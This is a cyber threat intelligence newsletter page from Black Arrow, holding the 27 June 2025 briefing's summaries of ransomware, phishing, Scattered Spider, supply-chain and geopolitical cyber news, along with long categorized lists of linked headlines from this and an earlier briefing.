Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Data Breaches/Leaks
Qantas confirms cyber-attack exposed records of up to 6 million customers | Qantas | The Guardian
Ahold Delhaize Data Breach Impacts 2.2 Million People - SecurityWeek
Dark Web Vendors Shift to Third Parties, Supply Chains
FBI: Cyber criminals steal health data posing as fraud investigators
Kelly Benefits data breach has impacted 550,000 people
Growing cyber security apathy is a growing crisis - Tech Monitor
Esse Health says recent data breach affects over 263,000 patients
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Organised Crime & Criminal Actors
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Slavery, torture, human trafficking discovered at 53 Cambodian online scamming compunds | CyberScoop
US sanctions yet another Russian bulletproof hosting outfit • The Register
When hackers become hitmen • Graham Cluley
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US shuts down a string of North Korean IT worker scams • The Register
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Fraudsters behind €460 million crypto scam arrested in Spain - Help Net Security
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
Insider Risk and Insider Threats
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
50 customers of French bank hit after insider helped SIM swap scammers
Seven months for IT worker who trashed his work network • The Register
New hires, new targets: Why attackers love your onboarding process - Help Net Security
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Insurance
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Supply Chain and Third Parties
Dark Web Vendors Shift to Third Parties, Supply Chains
Third-party breaches double, creating ripple effects across industries - Help Net Security
Cloud/SaaS
Are we securing AI like the rest of the cloud? - Help Net Security
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Outages
Report highlights the cost of network failures for businesses ...
Internet outages are costing companies millions every month - Help Net Security
Encryption
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Linux and Open Source
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
Passwords, Credential Stuffing & Brute Force Attacks
Regulations, Fines and Legislation
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
UK eyes new laws over cable sabotage • The Register
Google hit with $314m fine for collecting data from idle Android phones without permission
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Patrick Ware Named Executive Director of US Cyber Command - SecurityWeek
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Models, Frameworks and Standards
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
Data Protection
Google hit with $314m fine for collecting data from idle Android phones without permission
Careers, Working in Cyber and Information Security
Why Cyber Security Should Rethink Inclusion For Neurodivergent People
Law Enforcement Action and Take Downs
Scam centres are spreading, and so is the human cost - Help Net Security
Seven months for IT worker who trashed his work network • The Register
Police dismantles investment fraud ring stealing €10 million
Europol shuts down Archetyp Market, longest-running dark web drug marketplace
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Ex-NATO hacker: In cyber, there’s no such thing a ceasefire • The Register
UK eyes new laws over cable sabotage • The Register
Cyber attacks by Iranian hackers may be incoming | Cybernews
Nation State Actors
China
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
UK eyes new laws over cable sabotage • The Register
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Germany asks Google, Apple to remove DeepSeek AI from app stores
Silver Fox Suspected in Taiwan Campaign Using DeepSeek
Russia
US sanctions yet another Russian bulletproof hosting outfit • The Register
UK eyes new laws over cable sabotage • The Register
Inside Russia’s secret digital war on NATO’s logistics lifeline to Ukraine - Euromaidan Press
Russia’s throttling of Cloudflare makes sites inaccessible
Calling Out Russia: France’s Shift on Public Attribution – War on the Rocks
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Iran
Iran-linked hackers resurface, threaten to release more stolen Trump emails | Cybernews
Iran-linked hackers may target US firms and critical infrastructure, US government warns
Iranian Cyber Threats Persist Despite Ceasefire, US Intelligence Warns - Infosecurity Magazine
The Evolving Iranian Cyber Threat | AFCEA International
North Korea
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
US steps up pursuit of hackers linked to North Korea’s nuclear programme
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Tools and Controls
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Internet outages are costing companies millions every month - Help Net Security
71% of new hires click on phishing emails within 3 months - Help Net Security
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Microsoft admits to Intune forgetfulness • The Register
Why AV is an overlooked cyber security risk | TechRadar
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
New hires, new targets: Why attackers love your onboarding process - Help Net Security
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
Let’s Encrypt ends certificate expiry emails to cut costs, boost privacy
How to Reduce Alert Fatigue in Cyber Security - Security Boulevard
Other News
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
Report highlights the cost of network failures for businesses ...
The Same Cyberhacking Group Breached 3 Airlines In 3 Weeks
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
International Criminal Court hit by cyber attack - iTnews
Swiss Regulator Pressures Swissquote Over Rising Cyber Crime Risks: Report
The Cyber Risk SMBs Can’t Afford To Ignore
Why every company needs a travel security program | CSO Online
Why UK cyber security has become so vulnerable - UKTN
Cyber attacks shake voters’ trust in elections, regardless of party
Retail, the industry hackers can’t resist | theHRD
Security Bite: How hackers can take over your Mac using Bluetooth - 9to5Mac
NTLM relay attacks are back from the dead - Help Net Security
Cornwall school forced to shut over cyber security issue - Cornwall Live
Cyber in the energy sector, from reaction to resilience | Professional Security Magazine
Germany seeks Israeli partnership on cyber defence, plans 'cyber dome' | Reuters
UK firms are 'sleepwalking' into smart building cyber threats | IT Pro
Cyber attacks are draining millions from the hospitality industry - Help Net Security
Two-thirds of EU bodies earn lowest security grades | Cybernews
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Vulnerability Management
11 Million Critical Vulnerabilities Exposed — Act Now
A third of threats left unremeditated for 90 days - IT Security Guru
Initial Access Broker Self-Patches Zero Days as Turf Control
Vulnerability Debt: Putting a Price on What to Fix
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Vulnerabilities
Evidence Suggests Exploitation of CitrixBleed 2 Vulnerability - SecurityWeek
Thousands of Citrix NetScaler Instances Unpatched Against Exploited Vulnerabilities - SecurityWeek
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Google Issues Emergency Patch for Fourth Chrome Zero-Day of 2025 - Infosecurity Magazine
Critical Vulnerability in Anthropic's MCP Exposes Developer Machines to Remote Exploits
Millions of headphones vulnerable to Bluetooth hacks | Cybernews
Cisco warns that Unified CM has hardcoded root SSH credentials
Urgent Update: Microsoft Edge Fixes Actively Exploited Chromium Vulnerability
WordPress Plugin Flaw Exposes 600,000 Sites to File Deletion - Infosecurity Magazine
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Bluetooth flaws could let hackers spy through your microphone
CISA tells TeleMessage users to patch after active exploits • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 27 June 2025
Black Arrow Cyber Threat Intelligence Briefing 27 June 2025:
-Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
-New Hires More Likely to Fall for Phishing and Social Engineering Attacks
-BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
-More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
-Half of Security Pros Want GenAI Deployment Pause
-Cyber Attacks on Insurers Put CFOs on High Alert
-Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
-Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
-Police Alerts About New SMS “Blaster” Scams Used for Smishing
-Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
-Businesses Urged to Strengthen Cyber Defences amid Increase in Iran-Adjacent Attacks
-National Security Strategy 2025: Security for the British People in a Dangerous World
-How Geopolitical Tensions Are Shaping Cyber Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, our review of cyber security intelligence in the specialist and general media includes the latest ransomware report by Sophos, which shows that nearly half of organisations paid the ransom and over 40% of victims cited unrecognised security gaps as entry points for attackers. We discuss that popular entry points include employees, with phishing being particularly successful against newly hired employees and smaller organisations not training their staff. We also discuss the pressures of cyber security on key roles in the organisation: for CISOs, more than half are under pressure to keep breaches secret and many want a pause on AI deployment in their organisation; for CFOs, the challenge is to quantify and manage the financial risk of a breach.
Other articles describe how attackers are moving into the insurance, aviation and transportation sectors, while other attackers are using tactics including hijacking search results for major brands, or sending malicious text messages to phones that have been lured onto fake networks. Businesses are urged to address their supply chain risks and their wider security in the light of geopolitical risks from the Middle East, Russia, China and North Korea.
The recurring theme is the need for organisations to understand and proactively manage their risks through proportionate controls, and to establish and rehearse how to respond to an incident in order to remain resilient in the face of escalating threats.
Top Cyber Stories of the Last Week
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
Sophos’ latest global report shows nearly half of organisations hit by ransomware paid to regain access to their data, with a median payment of one million dollars. 53% negotiated lower sums than initially demanded, and the average recovery cost fell from $2.73 million to $1.53 million year on year. Over 40% of victims cited unrecognised security gaps as entry points for attackers, with lack of staff or expertise remaining a key weakness. However, more firms are halting attacks before data is encrypted, and faster recovery times suggest some organisations have improved readiness against ransomware threats.
New Hires More Likely to Fall for Phishing and Social Engineering Attacks
A recent study highlights that 71% of new hires click on phishing emails within their first three months, making them 44% more likely to fall victim than experienced staff. This increased risk stems from limited security training during onboarding and eagerness to please superiors, especially when emails appear to come from senior figures like the CEO or HR. Encouragingly, organisations that implemented tailored phishing simulations and behaviour-focused training saw phishing risk drop by 30%. Early, practical cyber security training is essential to equip new employees to recognise and report suspicious activity, strengthening overall organisational defences.
https://natlawreview.com/article/new-hires-more-likely-fall-phishing-social-engineering-attacks
BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
BT has warned that UK small and medium-sized enterprises face increasing cyber threats, with 42% of small and 67% of medium firms suffering an attack in the past year. Two in five, the equivalent of two million, SMEs have not provided any cyber security training, leaving them vulnerable to phishing and ransomware, which has more than doubled in a year. QR code scams have surged 1,400% over five years. The average cost of a serious breach for small firms is nearly £8,000, and many SMEs lack the resources or awareness to defend against emerging threats such as AI-driven attacks and account takeovers.
More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
A recent Bitdefender survey has revealed that 57% of cyber security professionals worldwide have been pressured to keep breaches secret, with Singapore and the US experiencing the highest rates. The study also highlights growing concerns over AI-driven cyber attacks, which 67% reported had increased and 51% cited as their top risk. Notably, a gap exists between executives’ high confidence in cyber resilience and mid-level managers’ lower assurance. Skills shortages, complex security tools, and challenges securing hybrid systems emerged as key obstacles, with nearly half saying the cyber security skills gap had worsened over the past year.
Half of Security Pros Want GenAI Deployment Pause
Research by security firm Cobalt reveals that nearly half of security professionals believe a pause on generative AI deployment is needed, as 36% feel adoption is outpacing their teams’ ability to manage risks. Three-quarters of practitioners consider generative AI their top IT risk, with concerns including exposure of sensitive data, manipulation of training information and model inaccuracies. Only 21% of serious vulnerabilities identified in generative AI tools are resolved. The report stresses that traditional web security measures like input validation remain essential, while highlighting that addressing prompt-based attacks on AI systems demands expert, adaptive testing.
https://www.infosecurity-magazine.com/news/half-security-pros-genai-pause/
Cyber Attacks on Insurers Put CFOs on High Alert
Recent cyber attacks on major insurers, including Aflac, have heightened concerns among chief financial officers about quantifying and managing the financial risks of data breaches in the insurance sector. Aflac detected unauthorised access to its network involving sensitive data such as health records and Social Security numbers. While operations remain unaffected and ransomware was not involved, the attack is linked to a sophisticated criminal group known for exploiting staff through social engineering, which uses deception to manipulate employees. Other insurers have faced similar breaches, signalling a rising trend of targeted attacks against the insurance industry that demand immediate attention from senior leaders.
https://fortune.com/2025/06/24/cyberattacks-insurers-aflac-cfo-high-alert/
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
Recent cyber attacks on UK retailers Marks & Spencer and Co-op, linked to the same criminal group Scattered Spider, have resulted in combined damages estimated between £270 million and £440 million. These incidents exploited social engineering, where attackers tricked IT help desks to gain access. The attacks are considered a significant event with deep impacts on both firms and their suppliers. Experts warn that Scattered Spider is now targeting the insurance, aviation and transportation sectors, urging heightened vigilance.
https://thehackernews.com/2025/06/scattered-spider-behind-cyberattacks-on.html
Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
Cyber criminals are hijacking search results for major brands like Netflix, Apple, and Bank of America, placing fake ads that lead victims to authentic-looking support pages showing fraudulent phone numbers. When users call these numbers, scammers posing as help-desk staff trick them into giving away personal or financial details, or granting remote access to their devices. This attack exploits weaknesses in website search functions and is difficult for browsers to detect. Organisations should raise awareness that legitimate support will never request sensitive information over the phone, and staff should be wary of unsolicited phone numbers in search results.
https://www.theregister.com/2025/06/20/netflix_apple_bofa_websites_hijacked/
Police Alerts About New SMS “Blaster” Scams Used for Smishing
UK Police have highlighted a rise in smishing attacks involving SMS blasters; these are radio devices that attract and connect to mobile phones in the area, and then send out text messages to those phones appearing to be from trusted organisations. A recent case saw a man jailed for sending thousands of scam messages from a car in London to steal personal information. Although some networks have blocked millions of scam texts, individuals are urged to avoid engaging with suspicious messages and report them to their mobile network provider. Disabling 2G on Android or filtering unknown senders on iPhones can further reduce exposure to these threats.
https://cybernews.com/news/police-alerts-about-new-sms-blaster-scams-used-for-smishing/
Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
A new report from SecurityScorecard shows that 5 in 6 organisations face heightened cyber security risks due to outdated supply chain defences. Third-party involvement in breaches has doubled to nearly 30%, yet fewer than half of firms monitor cyber security across even half of their extended supply chains. Over 70% have suffered at least one serious third-party incident in the past year. Experts warn that without integrated detection and incident response, organisations remain vulnerable to cascading impacts from supply chain cyber attacks.
Businesses Urged to Strengthen Cyber Defences Amid Increase in Iran-Adjacent Attacks
Cyber security experts have warned of a sharp rise in cyber attacks linked to Iran following the recent Israel-Iran conflict, with UK, US and EU businesses targeted. Attacks have included attempts to crash systems by overwhelming them with traffic, malicious software designed to delete data, and coordinated disinformation campaigns. UK Prime Minister Sir Keir Starmer described these cyber attacks as assaults on the UK itself, urging firms to urgently review and strengthen their cyber security. Experts caution that companies may be targeted simply for being connected to Western interests. Organisations are urged to strengthen security by promptly applying updates, using strong access controls, and preparing incident response plans. Experts stress the importance of employee awareness and real-time monitoring to counter sophisticated attack techniques aimed at disruption and data theft.
National Security Strategy 2025: Security for the British People in a Dangerous World
The UK’s National Security Strategy 2025 sets out the country’s response to an increasingly dangerous world, committing to spend 5% of GDP on national security by 2035. It highlights rising threats from Russia, China and Iran, and warns of growing cyber attacks undermining public services. The strategy stresses stronger borders, revitalising the defence industry, and aligning technology and economic resilience with security goals. It calls for a national effort to build resilience, improve cyber defences and ensure stability at home and abroad, emphasising that economic security and technological advantage are now central to protecting the British people.
How Geopolitical Tensions Are Shaping Cyber Warfare
Geopolitical tensions are fuelling a surge in cyber attacks as nation-state-backed groups target governments, finance, and infrastructure with increasing speed and sophistication. Iran focuses on disruption for political gain, North Korea pursues profit through theft, and Russia and China aim for long-term strategic advantage. Attackers often reuse old tools with new delivery methods, exploiting poor patching and weak user awareness. Artificial intelligence is compounding risks by enabling precise, large-scale attacks. To remain resilient, organisations must combine strong basics like patching and training with intelligence-led testing of defences tailored to the specific threats they face.
https://www.darkreading.com/vulnerabilities-threats/geopolitical-tensions-shape-cyber-warfare
Governance, Risk and Compliance
Comms Business - Almost 40 per cent of SMEs have no cyber security training, BT survey finds
BT says nearly half small businesses have suffered a cyber attack in the last year
Cyber security neglect issue for UK businesses? - The Recycler
More than half of cyber security professionals told to conceal breaches, survey claims
SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Cyber security Governance: A Guide for Businesses to Follow | TechTarget
Is Your CISO Ready to Flee? - Security Boulevard
After a hack many firms still say nothing, and that’s a problem - Help Net Security
Cyber attacks on insurers put CFOs on high alert | Fortune
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
How Customer Trust Can Shield Your Business In A Crisis
What is Risk Avoidance? | Definition from TechTarget
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Threats
Ransomware, Extortion and Destructive Attacks
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
UK ransomware costs significantly outpace other countries | Computer Weekly
Four REvil ransomware crooks walk free after admitting guilt • The Register
Ransomware threat actors today and how to thwart them | TechTarget
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Qilin Ransomware Adds "Call Lawyer" Feature to Pressure Victims for Larger Ransoms
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
Dire Wolf Ransomware Comes Out Snarling, Bites Verticals
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
Ransomware Victims
Major insurer hit by giant cyber attack | Insurance Business America
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
M&S cyber-attack boosted sales at Next, Zara and H&M
Patient death at London hospital linked to cyber attack on NHS – DataBreaches.Net
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
3 key takeaways from the Scattered Spider attacks on insurance firms
Whole Foods supplier UNFI restores core systems after cyber attack
Services disrupted as cyber attack hits Glasgow Council - UKTN
Phishing & Email Based Attacks
Report on New Hires and Phishing Susceptibility
Microsoft 365 'Direct Send' abused to send phishing as internal users
Other Social Engineering
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use US Banks to Fleece Americans — ProPublica
ClickFix attacks skyrocketing more than 500% - Help Net Security
New FileFix Method Emerges as a Threat Following 517% Rise in ClickFix Attacks
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Fraud, Scams and Financial Crime
Netflix, Apple, BofA sites hijacked with fake help numbers • The Register
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use U.S. Banks to Fleece Americans — ProPublica
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
UK cyber attacks set to continue amid ‘fraud pandemic’, security experts warn | The Independent
Amazon Prime Day Is Coming — How To Protect Yourself From Scammers
Artificial Intelligence
New AI Jailbreak Bypasses Guardrails With Ease - SecurityWeek
Most AI and SaaS apps are outside IT's control - Help Net Security
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
AI Is Behind 50% Of Spam — And Now It’s Hacking Your Accounts
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Navigating Generative AI's Expanding Capabilities and Evolving Risks
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Vulnerability in Public Repository Could Enable Hijacked LLM Responses | Security Magazine
And Now Malware That Tells AI to Ignore It?
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
We know GenAI is risky, so why aren't we fixing its flaws? - Help Net Security
US Army Blocks Air Force's AI Program Over Data Security Concerns | Air & Space Forces Magazine
Malware
Researchers discover first malware to exploit AI prompt injection
And Now Malware That Tells AI to Ignore It?
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Threat Actor Trojanizes Copy of SonicWall NetExtender App
Attackers Wield Signed ConnectWise Installers as Malware
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Prometei botnet activity has surged since March 2025
WinRAR patches bug letting malware launch from extracted archives
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
OneClik Malware Targets Energy Sector Using Microsoft ClickOnce and Golang Backdoors
Bots/Botnets
Prometei botnet activity has surged since March 2025
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
Mobile
Godfather Malware Targets 400+ Banking Apps Worldwide
SparkKitty Swipes Pics From iOS, Android Devices
What to do if your mobile phone account is hacked or number stolen | Mobile phones | The Guardian
Denial of Service/DoS/DDoS
Cloudflare blocked record-breaking 7.3 Tbps DDoS attack against a hosting provider
Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic - Ars Technica
Internet of Things – IoT
Typhoon-like gang slinging TLS certificate 'signed' by LAPD • The Register
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
DSIT identifies cyber security weaknesses in IoT devices | UKAuthority
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Data Breaches/Leaks
Supply Chain Attack Hits Swiss Banks | SC Media UK
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Oxford City Council suffers breach exposing two decades of data
Hacker 'IntelBroker' charged in US for global data theft breaches
Steel Giant Nucor Confirms Data Stolen in Cyber Attack
Cyber attacks at two Melbourne hospitals expose patient details on dark web
Hawaiian Airlines discloses cyber attack, flights not affected
Former US Army Sergeant admits he sold secrets to China • The Register
Advance Auto Parts data breach class action settlement
Organised Crime & Criminal Actors
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
Man pleads guilty to hacking networks to pitch security services
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
Money mule networks evolve into hierarchical, business-like criminal enterprises - Help Net Security
Africa Sees Surge in Cyber Crime as Law Enforcement Struggles
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Attackers Target Docker APIs in Stealthy Crypto Heist
Supply Chain and Third Parties
SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Supply Chain Attack Hits Swiss Banks | SC Media UK
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
Most organisations are at risk thanks to immature supply chain security | TechRadar
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
MSPs Juggle High Breach Rates and Strong Cyber Confidence | MSSP Alert
Security pro counts the cost of Microsoft dependency • The Register
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Officials set out cyber security charter for NHS suppliers | UKAuthority
Cloud/SaaS
Most AI and SaaS apps are outside IT's control - Help Net Security
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
Outages
UK mobile telco Three suffers voice, text outage • The Register
Encryption
China breaks RSA encryption with a quantum computer - Earth.com
Quantum risk is already changing cyber security - Help Net Security
Home Office anti-encryption site pushes payday loan scheme • The Register
Linux and Open Source
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Linux flaws chain allows Root access across major distributions
French city of Lyon ditching Microsoft for FOSS • The Register
Passwords, Credential Stuffing & Brute Force Attacks
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Brother printer bug in 689 models exposes default admin passwords
Social Media
Regulations, Fines and Legislation
Home Office anti-encryption site pushes payday loan scheme • The Register
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Top Pentagon spy pick rejected by White House - POLITICO
WhatsApp messaging app banned on all US House of Representatives devices | WhatsApp | The Guardian
CISA Is Shrinking: What Does It Mean for Cyber?
Foreign aircraft, domestic risks | CSO Online
Models, Frameworks and Standards
New Cyber Blueprint to Scale Up the EU Cyber Security Crisis Management | ENISA
Careers, Working in Cyber and Information Security
Why work-life balance in cyber security must start with executive support - Help Net Security
Getting a career in cyber security isn’t easy, but this can help
UK Gov Cyber Security Jobs Average Salary is Under £45,000, Study Finds - Infosecurity Magazine
Charming Kitten APT Tries Spying on Israeli Cyber Experts
Law Enforcement Action and Take Downs
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Four REvil ransomware crooks walk free after admitting guilt • The Register
Hacker 'IntelBroker' charged in US for global data theft breaches
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
How Cyber Warfare Changes the Face of Geopolitical Conflict
How Geopolitical Tensions Are Shaping Cyber Warfare
Cyber warfare escalates: Israel and Iran's digital conflict
Nation State Actors
How Cyber Warfare Changes the Face of Geopolitical Conflict
Are we making hackers sound too cool? These security experts think so | TechRadar
Decade of risk: signaling security in an era of geopolitical tension - DCD
China
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
China breaks RSA encryption with a quantum computer - Earth.com
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
China-linked APT Salt Typhoon targets Canadian Telecom companies
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Former US Army Sergeant admits he sold secrets to China • The Register
China increases cyber attacks on hospitals to ‘humiliate’ Taiwan
Russia
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Iran
Cyber warfare escalates: Israel and Iran's digital conflict
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
